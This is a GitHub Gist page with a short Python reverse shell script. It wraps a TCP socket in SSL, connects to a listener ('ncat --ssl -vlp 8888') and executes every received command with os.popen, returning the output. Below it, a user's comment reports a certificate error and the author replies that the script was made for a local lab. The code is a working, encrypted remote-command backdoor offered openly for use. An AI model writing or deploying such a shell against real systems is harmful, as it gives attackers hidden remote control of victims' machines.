Created
March 13, 2020 19:24
-
-
Save davidlares/d442558bb6dc9838fd6f5a6ce29191ec to your computer and use it in GitHub Desktop.
A simple Reverse shell script with SSL encryption (Wrapping sockets)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ''' | |
| The counterpart is done by: ncat --ssl -vlp 8888 | |
| ''' | |
| import os | |
| import socket | |
| import ssl # for socket wrapper | |
| if __name__ == "__main__": | |
| # values | |
| host = "localhost" | |
| port = 8888 | |
| # socket instance | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| # wrapping with SSL | |
| wsock = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) | |
| # now, using the secured socket | |
| wsock.connect((host,port)) | |
| while True: | |
| # receiving | |
| command = wsock.recv(1000) | |
| # receiving command | |
| result = os.popen(command).read() | |
| # sending command | |
| wsock.send(result) |
This was a local lab. I created a self-signed certificate for it. This script was "intended" to show how to wrap the socket into SSL, nothing more. To solve it, create your own SSL with openssl, it's pretty straightforward.
Hope it helps.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Every time I run this I get this error:
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate (_ssl.c:997)